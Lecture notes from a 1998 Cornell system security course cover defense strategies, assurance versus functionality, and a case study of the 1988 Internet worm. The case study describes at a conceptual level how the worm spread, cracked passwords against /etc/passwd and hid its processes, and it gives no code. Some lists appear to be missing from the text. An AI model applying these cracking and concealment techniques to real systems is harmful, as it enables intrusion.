Real Security and the Internet Worm

CS 513 -- System Security -- January 27, 1998 -- Lecture 3
Lecturer: Professor Fred B. Schneider

Lecture notes by Lynette I. Millett

For those planning to participate in the optional project annex: group membership declarations are due today at noon.
Homework 1 is due Thursday, and should be done in groups of 2 or 3.

Further Reading:
For a discussion of the internet worm described in today's lecture see: Communications of the ACM (CACM) Vol. 32, No. 6, June 1989.

In the last lecture we discussed the gold (Au) standard for security; it involves: We now ask: What are good strategies for defense? How can we make sure that attacks won't succeed? There are four strategies we might consider: The latter three strategies require being able to distinguish the bad guys from the good guys, and that means some sort of authentication process. Keeping the bad guys out requires having a list of the good guys. Letting the bad guys in but preventing them from doing harm requires not only a list of the good guys, but an authorization mechanism as well. This authorization can be done at many levels of the system. For example, read/write/execute privileges in a UNIX system are done at the file level. Authorization could also be done at the level of fields in data records. The closer to the application level, the greater the possibility of authorizing precisely what is required. However, if done at a higher level, it is possible for the success of the mechanism to become application dependent. At a lower level, authorization is likely to be simpler. The less complex such facilities are, the fewer bugs there will be. Thus lower level authorizations can provide higher assurance. This is a classic trade-off: functionality vs. assurance. The fourth option above depends heavily on audit facilities that cannot be subverted by the bad guys. Thus, audit requires authorization.


The issue of assurance brings up a whole family of issues. It is not enough that a system be secure or trustworthy. It must be demonstrably so. Before a system can be trusted, it is necessary to convince people that it satisfies the security requirements. The question becomes: What do you know and how do you know it? There are several ways to answer this question. One weak answer is to claim that the system has been debugged thoroughly. Another is to note that the system has been deployed and tested extensively. Yet a third may be to point to an agency, like NSA, that has approved it. (The latter may not provide as much of a security guarantee as one would hope.)

In general, the two strongest methods used to increase assurance are extensive testing by outside groups and mathematical proof. Mathematical proofs can be very long and involved even for small programs, and thus are not likely to be feasible for large, complicated systems.

The question of assurance is also related to an engineering question. If a system is designed to have the fewest number of critical components, then testing those components thoroughly can be a lower-cost way to increase assurance than by testing an entire system.

Recall also that assuring security requirements is difficult because of their lack of specificity. Assurance of functional requirements is easier to demonstrate. In fact, systems can be located on the following graph.

An application such as Microsoft Word is likely in the danger zone. It has high functionality and lots of bugs. On the other extreme are simpler mechanisms that have a high degree of assurance, such as the kernel. System designers must decide where they want their products to be on the functionality-assurance graph, and also how to convey such information to their customers.

Case Study: The Internet Worm

We have completed an overview of security and security issues. The next topic we discuss will be access control . Before that, however, it seems sensible to examine a real world example in detail. At a minimum, this ought to provide some real perspective on security. We discuss a series of attacks that occurred in November, 1988. The full details are available in CACM. (See Further Reading at the top of this page.)

In 1988 a "worm" was unleashed on the Internet. This worm infected SUN 3 and VAX machines running 4.2 BSD UNIX. The worm was written by Robert Morris, a first-year Computer Science Ph.D. student at Cornell at the time. He was convicted under the 1986 Computer Fraud and Abuse Act in 1990. He was ordered to pay a $10,000 fine, sentenced to 3 years probation and 400 hours of community service. He was also expelled from Cornell and his subsequent re-admission attempt failed. It should be noted that under the 1986 Act, malice is not necessary for conviction. A misguided experiment is sufficient for conviction. The worm's effect was to cause infected systems to become more and more loaded with processes. This used up resources, such as swap space and the process table, which eventually caused the machine to crash.

Definitions: worm vs. virus.

Both of these terms originated in the science fiction literature. John Brunner in "The Shockwave Rider" (1975) first used the term worm and David Gerrold suggested the term virus in "When Harlie was One" (1972).

How the Worm Operated

There were two basic parts to the Internet worm: A main program and a bootstrap (or vector) program. The main program collected information from the host on which it was running, and used that information to decide what other network ids the current machine could connect to. The worm exploited vulnerabilities in the UNIX operating system to get the bootstrap program running on those machines.

The bootstrap program consisted of 99 lines of C code. It compiled and ran on remote machines. Compilation allowed it to exploit the fact that most machines could compile C, rather than needing to distribute machine code for all possible machine/operating system configurations. This monoculture (all machines "understanding" C and UNIX) made for much easier penetration and raises intriguing questions about the spread of languages like Java, which also promote a monoculture. The bootstrap program had three command-line arguments: the network address of the infecting machine, the network port number to connect to to get copies of the main worm files, and a "magic number" used as a 1-time challenge password.

Once running, the bootstrap did the following:

Note that the real challenge here is getting the bootstrap (vector) installed and running. The Internet worm exploited four well-known vulnerabilities in UNIX to install the bootstrap program:

Once a remote machine has been infected, the worm needs to guess passwords for local accounts. On UNIX, the file /etc/passwd stores encrypted versions of user passwords. A brute force attack allows password cracking. The worm has a list of words, which it encrypts, and then compares to the encrypted passwords in /etc/passwd. Specifically, the worm first checks an internal list of 432 commonly-used passwords (discovered empirically before deployment of the worm.) Then, more attempts are made using the UNIX on-line dictionary. Some sites reported that up to 50% of their passwords were cracked using this approach.

During execution of the main loop, the worm checked for other worms running on the same machine. This was done by connecting to host port 11357 using UDP. If it succeeded, the worm would set an internal value that would cause it to halt. However, one out of seven worms did not check for others and thus became "immortal." This was the primary cause of machines being overloaded.

In order to conceal itself, the worm would occasionally fork itself and kill the parent. This had the effect that no single process accumulated excessive amounts of CPU. It also made sure that the UNIX scheduler would not re-prioritize ("nice") the worm's process due to the length of time it had been running. Also, if the worm was present on a machine for more than 12 hours, it would flush its list of what had been infected and start over.

It is useful to consider why the Internet worm succeeded from a more abstract perspective. What were the vulnerabilities that the worm exploited?

The above problems are not atypical. Today, it is not subtle technical issues causing the vulnerabilities that are being exploited. Rather it is design and user practices.
Previous lecture.
Next lecture.
Index of lecture notes.
CS 513 homepage.